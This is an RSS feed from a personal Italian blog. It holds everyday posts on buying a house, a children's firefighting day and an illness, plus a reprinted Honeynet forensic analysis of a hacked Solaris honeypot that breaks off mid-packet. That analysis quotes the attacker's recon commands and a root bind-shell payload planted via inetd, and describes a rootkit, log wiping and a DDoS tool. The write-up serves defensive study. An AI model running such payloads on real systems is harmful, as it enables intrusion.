<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Una vita da...</title>
	<atom:link href="http://www.cuore.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.cuore.org</link>
	<description></description>
	<lastBuildDate>Thu, 11 Mar 2010 22:23:26 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Ho una casa!</title>
		<link>http://www.cuore.org/ho-una-casa/</link>
		<comments>http://www.cuore.org/ho-una-casa/#comments</comments>
		<pubDate>Thu, 11 Mar 2010 22:21:09 +0000</pubDate>
		<dc:creator>luca</dc:creator>
				<category><![CDATA[me?!]]></category>
		<category><![CDATA[felicità]]></category>
		<category><![CDATA[passione]]></category>
		<category><![CDATA[pensieri]]></category>
		<category><![CDATA[sentimenti]]></category>
		<category><![CDATA[vita]]></category>

		<guid isPermaLink="false">http://www.cuore.org/?p=1261</guid>
		<description><![CDATA[
Tempo fa parlavo in questo post del fatto che stessi comprando casa&#8230; bhe oggi è stato il giorno decisivo, ho fatto il rogito e sono finalmente proprietario, assieme alla mia ragazza, di una simpatica casetta!!  
io feliceeeeeeeeeeeeeeeeeeee!   ]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter size-full wp-image-1262" title="350px-Casa_disegno_bambino" src="http://www.cuore.org/wp-content/uploads/2010/03/350px-Casa_disegno_bambino.jpg" alt="" width="400" height="249" /></p>
<p>Tempo fa parlavo in questo <a href="http://www.cuore.org/chiavi-in-mano/">post </a>del fatto che stessi comprando casa&#8230; bhe oggi è stato il giorno decisivo, ho fatto il rogito e sono finalmente proprietario, assieme alla mia <strong>ragazza</strong>, di una simpatica casetta!! <img src='http://www.cuore.org/wp-includes/images/smilies/4.gif' alt=':D' class='wp-smiley' /> </p>
<p>io feliceeeeeeeeeeeeeeeeeeee!  <img src='http://www.cuore.org/wp-includes/images/smilies/1.gif' alt=':)' class='wp-smiley' /> </p><img src="http://www.cuore.org/?ak_action=api_record_view&id=1261&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.cuore.org/ho-una-casa/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ora ho capito&#8230;</title>
		<link>http://www.cuore.org/ora-ho-capito/</link>
		<comments>http://www.cuore.org/ora-ho-capito/#comments</comments>
		<pubDate>Tue, 09 Mar 2010 13:04:56 +0000</pubDate>
		<dc:creator>luca</dc:creator>
				<category><![CDATA[cittadino]]></category>
		<category><![CDATA[me?!]]></category>
		<category><![CDATA[ingiustizia]]></category>
		<category><![CDATA[politica]]></category>

		<guid isPermaLink="false">http://www.cuore.org/?p=1259</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div id="attachment_1258" class="wp-caption aligncenter" style="width: 306px"><a href="http://www.cuore.org/wp-content/uploads/2010/03/25944_382758370069_719190069_5371734_2524992_n.jpg" rel="lightbox[1259]"><img class="size-medium wp-image-1258" title="25944_382758370069_719190069_5371734_2524992_n" src="http://www.cuore.org/wp-content/uploads/2010/03/25944_382758370069_719190069_5371734_2524992_n-296x300.jpg" border="0" alt="" width="296" height="300" /></a><p class="wp-caption-text">L&#39;amaca - Michele Serra</p></div>
<p style="text-align: center;"><img src="http://www.cuore.org/?ak_action=api_record_view&id=1259&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.cuore.org/ora-ho-capito/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Il mondo che vorrei</title>
		<link>http://www.cuore.org/il-mondo-che-vorrei/</link>
		<comments>http://www.cuore.org/il-mondo-che-vorrei/#comments</comments>
		<pubDate>Mon, 08 Mar 2010 22:57:16 +0000</pubDate>
		<dc:creator>luca</dc:creator>
				<category><![CDATA[Vigile del Fuoco]]></category>
		<category><![CDATA[bambini]]></category>
		<category><![CDATA[minipompiere]]></category>
		<category><![CDATA[passione]]></category>
		<category><![CDATA[pensieri]]></category>
		<category><![CDATA[pompieropoli]]></category>
		<category><![CDATA[sensazioni]]></category>
		<category><![CDATA[vigili del fuoco]]></category>
		<category><![CDATA[vita]]></category>

		<guid isPermaLink="false">http://www.cuore.org/?p=1252</guid>
		<description><![CDATA[Ieri, domenica 7 marzo, presso il distaccamento dei Vigili del Fuoco di garbagnate milanese si è tenuta una giornata a porte aperte&#8230;
Per l&#8217;occasione si e organizzato un percorso / gioco per i più piccoli che simulava le attività di un pompiere (simil-pompieropoli), inutile dire che i bambini sono letteralmente impazziti&#8230; e la cosa mi ha [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_1251" class="wp-caption aligncenter" style="width: 204px"><a href="http://www.cuore.org/wp-content/uploads/2010/03/d60_immagine-094.jpg" rel="lightbox[1252]"><img class="size-medium wp-image-1251" title="d60_immagine 094" src="http://www.cuore.org/wp-content/uploads/2010/03/d60_immagine-094-194x300.jpg" border="0" alt="" width="194" height="300" /></a><p class="wp-caption-text">Domenica 7 Marzo 2009</p></div>
<p>Ieri, domenica 7 marzo, presso il distaccamento dei Vigili del Fuoco di garbagnate milanese si è tenuta una giornata a porte aperte&#8230;<br />
Per l&#8217;occasione si e organizzato un percorso / gioco per i più piccoli che simulava le attività di un pompiere (simil-pompieropoli), inutile dire che i bambini sono letteralmente impazziti&#8230; e la cosa mi ha fatto veramente felice anche se è stato _massacrante_  stare dietro a tutti.</p>
<p>Ho fatto un sacco di foto e vorrei poterne pubblicare di più.. sopratutto le facce dei bambini felici per questa giornata!<br />
Ovviamente per questioni legali preferisco aspettare una liberatoria, per ora accontentatevi di questa che è molto tenera.</p>
<p>Per maggio cercere di riorganizzare il tutto ancora più in grande!</p><img src="http://www.cuore.org/?ak_action=api_record_view&id=1252&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.cuore.org/il-mondo-che-vorrei/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Come sto?</title>
		<link>http://www.cuore.org/come-sto/</link>
		<comments>http://www.cuore.org/come-sto/#comments</comments>
		<pubDate>Mon, 01 Mar 2010 08:11:19 +0000</pubDate>
		<dc:creator>luca</dc:creator>
				<category><![CDATA[me?!]]></category>
		<category><![CDATA[malattia]]></category>

		<guid isPermaLink="false">http://www.cuore.org/?p=1248</guid>
		<description><![CDATA[Per far presto potrei dire &#8220;tutto bene&#8221; ma in realtà:
- Ho un mal di gola che non mi permette di mangiare null&#8217;altro se non gelati o yougurt
- Ho una fiacchetta che quando serro le mandibole rimane dentro (ma potrebbe anche essere il dente del giudizio ora che ci penso)
- Ho il palato ustionato che non [...]]]></description>
			<content:encoded><![CDATA[<p>Per far presto potrei dire &#8220;tutto bene&#8221; ma in realtà:<br />
- Ho un mal di gola che non mi permette di mangiare null&#8217;altro se non gelati o yougurt<br />
- Ho una fiacchetta che quando serro le mandibole rimane dentro (ma potrebbe anche essere il dente del giudizio ora che ci penso)<br />
- Ho il palato ustionato che non guarisce<br />
- Mi è tornata l&#8217;herpes<br />
- Le mani si sono riempite di bollicine strambe<br />
- Ho passato la notte tra venerdì e sabato con 39.4 di febbre</p>
<p>Ecco perchè non voglio dire &#8220;tutto bene&#8221;&#8230;</p><img src="http://www.cuore.org/?ak_action=api_record_view&id=1248&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.cuore.org/come-sto/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Incident Analysis</title>
		<link>http://www.cuore.org/incident-analysis/</link>
		<comments>http://www.cuore.org/incident-analysis/#comments</comments>
		<pubDate>Sat, 27 Feb 2010 13:11:48 +0000</pubDate>
		<dc:creator>luca</dc:creator>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[cracker]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[lamer]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.cuore.org/?p=1245</guid>
		<description><![CDATA[Facendo ordine tra i miei documenti ho ritrovo questa analisi che avevo fatto con un amico per un contest su honeynet e mi è venuta voglia di pubblicarla  
&#8212;[ Getting start
To start analysis we've downloaded the log files day1.log.gz and
day3.log.gz from http://project.honeynet.org/scans/scan28/ then
we checked for their md5sum and finally we've decompressed them.
$ wget http://project.honeynet.org/scans/scan28/day1.log.gz
--22:12:30-- [...]]]></description>
			<content:encoded><![CDATA[<p>Facendo ordine tra i miei documenti ho ritrovo questa analisi che avevo fatto con un amico per un contest su honeynet e mi è venuta voglia di pubblicarla <img src='http://www.cuore.org/wp-includes/images/smilies/1.gif' alt=':)' class='wp-smiley' /> </p>
<p>&#8212;[ Getting start</p>
<p>To start analysis we've downloaded the log files day1.log.gz and<br />
day3.log.gz from http://project.honeynet.org/scans/scan28/ then<br />
we checked for their md5sum and finally we've decompressed them.</p>
<p>$ wget http://project.honeynet.org/scans/scan28/day1.log.gz<br />
--22:12:30--  http://project.honeynet.org/scans/scan28/day1.log.gz<br />
           => `day1.log.gz'<br />
Resolving project.honeynet.org... done.<br />
Connecting to project.honeynet.org[63.107.222.112]:80&#8230; connected.<br />
<acronym title="HyperText Transfer Protocol">HTTP</acronym> request sent, awaiting response&#8230; 200 OK<br />
Length: 2,885,991 [application/x-gzip]</p>
<p>100%[====================================>] 2,885,991      7.87K/s<br />
ETA 00:00</p>
<p>22:18:31 (7.87 <acronym title="Kilobyte">KB</acronym>/s) &#8211; `day1.log.gz&#8217; saved [2885991/2885991]</p>
<p>$ wget http://project.honeynet.org/scans/scan28/day3.log.gz<br />
&#8211;22:20:15&#8211;  http://project.honeynet.org/scans/scan28/day3.log.gz<br />
           => `day3.log.gz&#8217;<br />
Resolving project.honeynet.org&#8230; done.<br />
Connecting to project.honeynet.org[63.107.222.112]:80&#8230; connected.<br />
<acronym title="HyperText Transfer Protocol">HTTP</acronym> request sent, awaiting response&#8230; 200 OK<br />
Length: 3,474,770 [application/x-gzip]</p>
<p>100%[====================================>] 3,474,770     27.22K/s<br />
ETA 00:00</p>
<p>22:22:21 (27.22 <acronym title="Kilobyte">KB</acronym>/s) &#8211; `day3.log.gz&#8217; saved [3474770/3474770]</p>
<p>$ md5sum day1.log.gz<br />
79e5871791542c8f38dd9cee2b2bc317  day1.log.gz<br />
$ md5sum day3.log.gz<br />
af8ab95f41530fe3561b506b422ed636  day3.log.gz<br />
$ gzip -d day1.log.gz<br />
$ gzip -d day3.log.gz</p>
<p>&#8212;[ Honeypot's <acronym title="Operating System">OS</acronym></p>
<p>The operating system of honeypot is a SunOS, we can deduce it in<br />
some different ways. Many hints was given by attacker, infact he had<br />
downloaded from the network a series of tools for SunOS.<br />
We can clearly see some binaries like "solbnc" and "ipv6sun" by watching<br />
day1.log with ethereal.<br />
Another way to deduce was offered again by attacker who<br />
downloaded some patches for the system from sunsolve.<br />
The easiest way was another time given by attacker:</p>
<p>17:36:37.972605 61-219-90-180.HINET-IP.hinet.net.56712 ><br />
192.168.100.28.ingreslock: P 1:209(208) ack 1 win 5840<br />
<nop ,nop,timestamp<br />
48511171 11<br />
3868611> (DF)<br />
0x0000   4500 0104 d486 4000 2c06 30c9 3ddb 5ab4        E.....@.,.0.=.Z.<br />
0x0010   c0a8 641c dd88 05f4 805b ec2e ba6d 43c2        ..d......[...mC.<br />
0x0020   8018 16d0 104d 0000 0101 080a 02e4 38c3        .....M........8.<br />
0x0030   06c9 7f43 756e 616d 6520 2d61 3b6c 7320        ...Cuname.-a;ls.<br />
0x0040   2d6c 202f 636f 7265 202f 7661 722f 6474        -l./core./var/dt<br />
0x0050   2f74 6d70 2f44 5453 5043 442e 6c6f 673b        /tmp/DTSPCD.log;<br />
0x0060   5041 5448 3d2f 7573 722f 6c6f 6361 6c2f        PATH=/usr/local/<br />
0x0070   6269 6e3a 2f75 7372 2f62 696e 3a2f 6269        bin:/usr/bin:/bi<br />
0x0080   6e3a 2f75 7372 2f73 6269 6e3a 2f73 6269        n:/usr/sbin:/sbi<br />
0x0090   6e3a 2f75 7372 2f63 6373 2f62 696e 3a2f        n:/usr/ccs/bin:/<br />
0x00a0   7573 722f 676e 752f 6269 6e3b 6578 706f        usr/gnu/bin;expo<br />
0x00b0   7274 2050 4154 483b 6563 686f 2022 4244        rt.PATH;echo."BD<br />
0x00c0   2050 4944 2873 293a 2022 6070 7320 2d66        .PID(s):."`ps.-f<br />
0x00d0   6564 7c67 7265 7020 2720 2d73 202f 746d        ed|grep.'.-s./tm<br />
0x00e0   702f 7827 7c67 7265 7020 2d76 2067 7265        p/x'|grep.-v.gre<br />
0x00f0   707c 6177 6b20 277b 7072 696e 7420 2432        p|awk.'{print.$2<br />
0x0100   7d27 600a                                      }'`.<br />
17:36:38.102597 192.168.100.28.ingreslock ><br />
61-219-90-180.HINET-<acronym title="Internet Protocol">IP</acronym>.hinet.net.56712: P 3:167(164) ack 209 win 24616<br />
</nop><nop ,nop,timestamp 11386865<br />
7 48511194> (DF)<br />
0x0000   4500 00d8 c8a3 4000 4006 28d8 c0a8 641c        E.....@.@.(...d.<br />
0x0010   3ddb 5ab4 05f4 dd88 ba6d 43c4 805b ecfe        =.Z......mC..[..<br />
0x0020   8018 6028 cf9c 0000 0101 080a 06c9 7f71        ..`(...........q<br />
0x0030   02e4 38da 5375 6e4f 5320 7a6f 6265 7269        ..8.SunOS.zoberi<br />
0x0040   7573 2035 2e38 2047 656e 6572 6963 5f31        us.5.8.Generic_1<br />
0x0050   3038 3532 382d 3039 2073 756e 3475 2073        08528-09.sun4u.s<br />
0x0060   7061 7263 2053 554e 572c 556c 7472 612d        parc.SUNW,Ultra-<br />
0x0070   355f 3130 0a2f 636f 7265 3a20 4e6f 2073        5_10./core:.No.s<br />
0x0080   7563 6820 6669 6c65 206f 7220 6469 7265        uch.file.or.dire<br />
0x0090   6374 6f72 790a 2f76 6172 2f64 742f 746d        ctory./var/dt/tm<br />
0x00a0   702f 4454 5350 4344 2e6c 6f67 3a20 4e6f        p/DTSPCD.log:.No<br />
0x00b0   2073 7563 6820 6669 6c65 206f 7220 6469        .such.file.or.di<br />
0x00c0   7265 6374 6f72 790a 4244 2050 4944 2873        rectory.BD.PID(s<br />
0x00d0   293a 2031 3737 330a                            ):.1773.</p>
<p>we can clearly see the "uname -a" output: "SunOS zoberius 5.8<br />
Generic_108528-09 sun4u sparc SUNW,Ultra-5_10"</p>
<p>We used passive fingerprinting of the server's packets by obtaining<br />
"SunOS 5.8 / 6" as result</p>
<p>Reassuming:</p>
<p>OPERATING SYSTEM    : SunOS zoberius 5.8 Generic_108528-09 sun4u sparc<br />
		      SUNW,Ultra-5_10</p>
<p><acronym title="Internet Protocol">IP</acronym>		    : 192.168.100.28 </p>
<p>---[ Break in</p>
<p>To break in the attacker has taken advantage of a vulnerability present<br />
in CDE (Common Desktop Environment), the default X Window System <acronym title="Graphical User Interface">GUI</acronym><br />
environment of SunOS. Infact the CDE Subprocess Control Server daemon is<br />
vulnerable to a buffer overflow that can be exploited just sending a<br />
particular client request. Once exploited the attacker can execute<br />
arbitrary commands on the system with superuser privileges.<br />
The dtspcd is configured to run on port 6112/tcp, and a typical inetd<br />
configuration is the following:</p>
<p>dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd</p>
<p>In day1.log we can observe a series of connections at port 6122/tcp,<br />
probably that connections were the specially crafted CDE client request<br />
used to exploit the service, followed by an exchange of datas on<br />
the dtspc ports.</p>
<p>0000  08 00 20 d1 76 19 00 07  ec b2 d0 0a 08 00 45 00   .. .v... ......E.<br />
0010  00 3c 1b ca 40 00 2c 06  ea 4d 3d db 5a b4 c0 a8   .< ..@.,. .M=.Z...<br />
0020  64 1c dc 4f 17 e0 80 39  28 15 00 00 00 00 a0 02   d..O...9 (.......<br />
0030  16 d0 15 51 00 00 02 04  05 b4 04 02 08 0a 02 e4   ...Q.... ........<br />
0040  33 df 00 00 00 00 01 03  03 00                     3....... ..      </p>
<p>0000  00 07 ec b2 d0 0a 08 00  20 d1 76 19 08 00 45 00   ........  .v...E.<br />
0010  00 40 c8 93 40 00 40 06  29 80 c0 a8 64 1c 3d db   .@..@.@. )...d.=.<br />
0020  5a b4 17 e0 dc 4f ba 39  4a 1e 80 39 28 16 b0 12   Z....O.9 J..9(...<br />
0030  60 28 34 4b 00 00 01 01  08 0a 06 c9 7a 75 02 e4   `(4K.... ....zu..<br />
0040  33 df 01 03 03 00 01 01  04 02 02 04 05 b4         3....... ......  </p>
<p>As supposed, in the stream we can see clearly the exploit at work and we<br />
can obtain some important information about the arbitrary executing code:</p>
<p>"ksh    -c  echo "ingreslock stream tcp nowait root /bin/sh sh<br />
-i">/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x"</p>
<p>0530  ff ec 82 10 20 0b 91 d0  20 08 2f 62 69 6e 2f 6b   .... ...  ./bin/k<br />
0540  73 68 20 20 20 20 2d 63  20 20 65 63 68 6f 20 22   sh    -c   echo "<br />
0550  69 6e 67 72 65 73 6c 6f  63 6b 20 73 74 72 65 61   ingreslo ck strea<br />
0560  6d 20 74 63 70 20 6e 6f  77 61 69 74 20 72 6f 6f   m tcp no wait roo<br />
0570  74 20 2f 62 69 6e 2f 73  68 20 73 68 20 2d 69 22   t /bin/s h sh -i"<br />
0580  3e 2f 74 6d 70 2f 78 3b  2f 75 73 72 2f 73 62 69   >/tmp/x; /usr/sbi<br />
0590  6e 2f 69 6e 65 74 64 20  2d 73 20 2f 74 6d 70 2f   n/inetd  -s /tmp/<br />
05a0  78 3b 73 6c 65 65 70 20  31 30 3b 2f 62 69 6e 2f   x;sleep  10;/bin/<br />
05b0  72 6d 20 2d 66 20 2f 74  6d 70 2f 78 20 41 41 41   rm -f /t mp/x AAA</p>
<p>Thanks to that information we know that the attacker will use a remote<br />
root shell binded on ingreslock by inetd. </p>
<p>---[ ICMP "skillz"</p>
<p>During the analysis we have noticed a large amount of ICMP<br />
(echo reply) packets with "skillz" in data field.  </p>
<p>0000  00 07 ec b2 d0 0a 08 00  20 d1 76 19 08 00 45 00   ........  .v...E.<br />
0010  04 14 40 5c 40 00 ff 01  87 f8 c0 a8 64 1c d9 74   ..@\@... ....d..t<br />
0020  26 0a 00 00 9c a3 1a 0a  00 00 00 00 00 00 00 00   &#038;....... ........<br />
0030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 73 6b   ........ ......sk<br />
0040  69 6c 6c 7a 00 00 00 00  00 00 00 00 00 00 00 00   illz.... ........</p>
<p>The ICMP packets with "skillz" in them are used by Stacheldrath<br />
D-DoS tool. In order to manage the DoSNet these ICMP are exchanged<br />
among all the hosts linked in it.<br />
This tool works on Linux and Solaris machines and can be used to perform<br />
ICMP, SYN and UDP flood attacks moreover the attacker can specify<br />
attack's duration and a range of ports for SYN flood.</p>
<p>---[ Sequences involved in the attack</p>
<p>The attack takes place in two days and follow these sequences:</p>
<p> [DAY 1]</p>
<p> &#8211; [1] Break in &#8211; The attacker gained a remote root shell by taking<br />
                  advantage of a vulnerability in dtspcd </p>
<p> &#8211; [2] Dummy hide &#8211; The attacker logged into the system thanks to the<br />
                    remote shell and created a home directory</p>
<p> &#8211; [3] Downloads &#8211; The attacker downloaded rootkit, utilities and patches<br />
                   from ftp and http sites </p>
<p> &#8211; [4] Rootkit &#8211; The attacker run a shell script for system patching<br />
                 and log cleaning. Log cleaning operations was done by<br />
                 erasing all the log files. The script had replaced<br />
                 also many unix utilities with trojaned versions</p>
<p> &#8211; [5] Backdoor &#8211; The attacker run a root backdoor using ssh</p>
<p> &#8211; [6] D-Dos &#8211; The attacker installed Stacheldrath client</p>
<p> &#8211; [7] Bouncer &#8211; The attacker installed an <acronym title="Internet Relay Chat">IRC</acronym> bouncer and connected it to<br />
             irc.stealth.net </p>
<p> [DAY 3]</p>
<p> &#8211; [1] Chat &#8211; The attacker chatted with BNC placed on some channels<br />
              in ircnet due to <acronym title="Internet Relay Chat">IRC</acronym> WAR actions</p>
<p> &#8211; [2] DOS &#8211; The attacker used the DoSNet against java.tiscalinet.it to<br />
             make a split for <acronym title="Internet Relay Chat">IRC</acronym> WAR actions </p>
<p> &#8211; [3] <acronym title="Secure Shell">SSH</acronym> &#8211; The attacker made a connection using <acronym title="Secure Shell">SSH</acronym> and modified the<br />
       TCP/<acronym title="Internet Protocol">IP</acronym> stack applying the IPv6 support  </p>
<p> &#8211; [4] Reboot &#8211; To make functional the IPv6 support the attacker rebooted<br />
                the system </p>
<p> &#8211; [5] IRC6 &#8211; The attacker made an ipv6 tunnel p-t-p and used the bnc<br />
              on irc6.edisontel.it  </p>
<p>&#8212;[ Martian Protocol</p>
<p>We don't expect to found the IPv6 protocol over an IPv4 network, in<br />
this circumstance the IPv6 stack was enabled by the attacker, he used<br />
this protocol to make <acronym title="Internet Relay Chat">IRC</acronym> connections using irc6.edisontel.it. The<br />
attacker is familiar to <acronym title="Internet Relay Chat">IRC</acronym> WAR and used a BNC in IPv6 to make it less<br />
exposed to DOS. We've identified this protocol because after the system<br />
reboot we've noticed a series of ipv6 connections on irc6.edisontel.it  </p>
<p>01:13:04.225906 ts.ipv6.tilab.com > 192.168.100.28: irc6.edisontel.com.ircd ><br />
2001:6b8:0:400::5d0e.32780: S 2882472594:2882472594(0) ack 53523087 win 5760<br />
<mss 1440,nop,nop,sackOK><br />
0x0000   4500 0058 7f78 0000 0b29 31a0 a3a2 aaad        E..X.x...)1.....<br />
0x0010   c0a8 641c 6000 0000 001c 063b 2001 0750        ..d.`......;...P<br />
0x0020   0002 0000 0202 a5ff fef0 aac7 2001 06b8        ................<br />
0x0030   0000 0400 0000 0000 0000 5d0e 1a0b 800c        ..........]&#8230;..<br />
0&#215;0040   abcf 0a92 0330 b28f 7012 1680 6596 0000        &#8230;..0..p&#8230;e&#8230;<br />
0&#215;0050   0204 05a0 0101 0402                            &#8230;&#8230;..</p>
<p>03:44:24.121894 ts.ipv6.tilab.com > 192.168.100.28: irc6.edisontel.com.ircd ><br />
2001:6b8:0:400::5d0e.32780: P 43131:43181(50) ack 7377 win 5760<br />
0&#215;0000   4500 0082 ef20 0000 0b29 c1cd a3a2 aaad        E&#8230;&#8230;..)&#8230;&#8230;<br />
0&#215;0010   c0a8 641c 6000 0000 0046 063b 2001 0750        ..d.`&#8230;.F.;&#8230;P<br />
0&#215;0020   0002 0000 0202 a5ff fef0 aac7 2001 06b8        &#8230;&#8230;&#8230;&#8230;&#8230;.<br />
0&#215;0030   0000 0400 0000 0000 0000 5d0e 1a0b 800c        &#8230;&#8230;&#8230;.]&#8230;..<br />
0&#215;0040   abcf b30d 0330 cf5f 5018 1680 84e8 0000        &#8230;..0._P&#8230;&#8230;.<br />
0&#215;0050   3a60 4f77 6e5a 6060 217e 6168 6161 4062        :`OwnZ&#8220;!~ahaa@b<br />
0&#215;0060   6163 6172 6469 2e6f 7261 6e67 652e 6f72        acardi.orange.or<br />
0&#215;0070   672e 7275 204e 4943 4b20 3a62 6f62 7a60        g.ru.NICK.:bobz`<br />
0&#215;0080   0d0a                                           ..</p>
<p>&#8212;[ System used</p>
<p>We have identified some different systems that have been involved in the<br />
attack. First of all we can identify the system used by the attacker to<br />
break into the honeynet. That system is a linux box (we check the<br />
operative system using the fingerprint) and its <acronym title="Internet Protocol">IP</acronym> is 61.219.90.180 .<br />
Investigating on that ip we can obtain some information about his owner:</p>
<p>$ whois -h whois.twnic.net 61.219.90.180<br />
Su, Yi Chun<br />
   No.37-24, Yu Ying Rd.<br />
   Changhua County Taiwan<br />
   TW</p>
<p>   Netname: SU-YI-CHUN-NET<br />
   Netblock: 61.219.90.128 &#8211; 61.219.90.191</p>
<p>   Administrator contact:<br />
      Yi Chun Su (YCS65-TW) mis@taiwang.org<br />
      TEL: +886-9-23-289293</p>
<p>   Technical contact:<br />
      Yi Chun Su (YCS65-TW) mis@taiwang.org<br />
      TEL: +886-9-23-289293</p>
<p>$   </p>
<p>The result of fingerprint is: Linux 2.4.0 &#8211; Linux 2.4.18</p>
<p>The second system identified is that of the attacker, we can see his<br />
evidences only when he established the connection to the <acronym title="Internet Relay Chat">IRC</acronym> BNC.<br />
The <acronym title="Internet Protocol">IP</acronym> of the attacker is 80.117.14.222 and investigating on it we can<br />
find that his connection is an ADSL provided by telecom italia:</p>
<p>bash-2.05b$ whois 80.117.14.222<br />
% This is the RIPE Whois server.<br />
% The objects are in RPSL format.<br />
%<br />
% Rights restricted by copyright.<br />
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html</p>
<p>inetnum:      80.117.0.0 &#8211; 80.117.255.255<br />
netname:      TINIT-ADSL-LITE<br />
descr:        Telecom Italia<br />
descr:        Accesso ADSL BBB<br />
country:      IT<br />
admin-c:      BS104-RIPE<br />
tech-c:       BS104-RIPE<br />
status:       ASSIGNED PA<br />
remarks:      Please send abuse notification to<br />
abuse-bbb@telecomitalia.it<br />
notify:       ripe-staff@telecomitalia.it<br />
mnt-by:       TIWS-MNT<br />
changed:      net_ti@telecomitalia.it 20020905<br />
source:       RIPE</p>
<p>route:        80.117.0.0/16<br />
descr:        INTERBUSINESS<br />
origin:       AS3269<br />
notify:       network@cgi.interbusiness.it<br />
mnt-by:       INTERB-MNT<br />
changed:      net_ti@telecomitalia.it  20011210<br />
source:       RIPE</p>
<p>person:       BBBEASYIP STAFF<br />
address:      Via Val Cannuta, 250<br />
address:      I-00100 Roma<br />
address:      Italy<br />
phone:        +39 06 36881<br />
e-mail:       ripe-staff@telecomitalia.it<br />
nic-hdl:      BS104-RIPE<br />
notify:       ripe-staff@telecomitalia.it<br />
changed:      net_ti@telecomitalia.it 20001019<br />
source:       RIPE</p>
<p>The result of fingerprint on the attacker system is: Windows XP Pro<br />
The third system is the server used by attacker for rootkit and<br />
utilities download. The <acronym title="Internet Protocol">IP</acronym> of that system is 62.211.66.16<br />
At the moment this <acronym title="Internet Protocol">IP</acronym> is assigned to telecom italia net (TIN)<br />
but maybe when take place the attack that <acronym title="Internet Protocol">IP</acronym> was assigned to XOOM<br />
free web hosting as we can see from the <acronym title="File Transfer Protocol">FTP</acronym> banner:</p>
<p>FTP: 220 services <acronym title="File Transfer Protocol">FTP</acronym> server (Version XOOM <acronym title="File Transfer Protocol">FTP</acronym> 1.24.3+local-release<br />
Fri Aug 28 15:52:40 PDT 1998) ready.</p>
<p>The result of the fingerprint on the system is: FreeBSD 4.5 </p>
<p>The latest system obviously is the honeynet, once the attacker<br />
break in, used it to make <acronym title="Internet Relay Chat">IRC</acronym> WAR and to make DoS over the<br />
net using Stacheldrath client. The honeynet system was linked to<br />
other two systems for D-DoS purposes:</p>
<p>61.134.3.11<br />
217.116.38.10</p>
<p>&#8212;[ Attacker Nationality</p>
<p>To identify the attacker nationality we have several ways. By watching the<br />
<acronym title="Internet Protocol">IP</acronym> and analyzing the whois output we can understand that the attacker is<br />
italian because he used an adsl provided by Telecom Italia. This<br />
kind of adsl is for home use and there are low probabilities that the<br />
attacker spoofed his ip to connect to the BNC<br />
The confirmation of attacker nationality comes just from BNC log, infact<br />
he talking on irc (in italian) told the name of the city where he lives:</p>
<p>: |AnDr34z|!~OmBr4@vhost.irc6.server.tb.ngnet.it PRIVMSG #bobz :ma tu di<br />
dove sei ,)<br />
: |AnDr34z|!~OmBr4@vhost.irc6.server.tb.ngnet.it PRIVMSG #bobz :che non<br />
ho ancora capito<br />
:bobz`!~ahaa@irc6.vhost.la PRIVMSG #bobz : Salerno</p>
<p>	Il pacchetto e&#8217; questo:</p>
<p>18:40:34.118157 irc-1.stealth.net.5555 > 192.168.100.28.32805: P<br />
46566:46617(51) ack 6890 win 8192 (DF)<br />
0&#215;0000   4500 005b 1b52 4000 3306 ec75 cefc c0c3        E..[.R@.3..u&#8230;.<br />
0&#215;0010   c0a8 641c 15b3 8025 c7a5 b672 fdbf cf3e        ..d&#8230;.%&#8230;r&#8230;><br />
0&#215;0020   5018 2000 ea48 0000 3a62 6f62 7a60 217e        P&#8230;.H..:bobz`!~<br />
0&#215;0030   6168 6161 4069 7263 362e 7668 6f73 742e        ahaa@irc6.vhost.<br />
0&#215;0040   6c61 2050 5249 564d 5347 2023 626f 627a        la.PRIVMSG.#bobz<br />
0&#215;0050   203a 5361 6c65 726e 6f0d 0a                    .:Salerno..</p>
<p>The attacker says that is from Salerno and standing by his <acronym title="Internet Protocol">IP</acronym> this is<br />
plausible. In another log the attacker reveal also his age</p>
<p>18:41:12.825540 irc-1.stealth.net.5555 > 192.168.100.28.32805: P<br />
47165:47214(49) ack 6979 win 8192 (DF)<br />
0&#215;0000   4500 0059 9e63 4000 3306 6966 cefc c0c3        E..Y.c@.3.if&#8230;.<br />
0&#215;0010   c0a8 641c 15b3 8025 c7a5 b8c9 fdbf cf97        ..d&#8230;.%&#8230;&#8230;..<br />
0&#215;0020   5018 2000 79f8 0000 3a62 6f62 7a60 217e        P&#8230;y&#8230;:bobz`!~<br />
0&#215;0030   6168 6161 4069 7263 362e 7668 6f73 742e        ahaa@irc6.vhost.<br />
0&#215;0040   6c61 2050 5249 564d 5347 2023 626f 627a        la.PRIVMSG.#bobz<br />
0&#215;0050   203a 616e 6e69 3f0d 0a                         .:anni?..</p>
<p>18:41:21.934924 irc-1.stealth.net.5555 > 192.168.100.28.32805: P<br />
47214:47289(75) ack 6979 win 8192 (DF)<br />
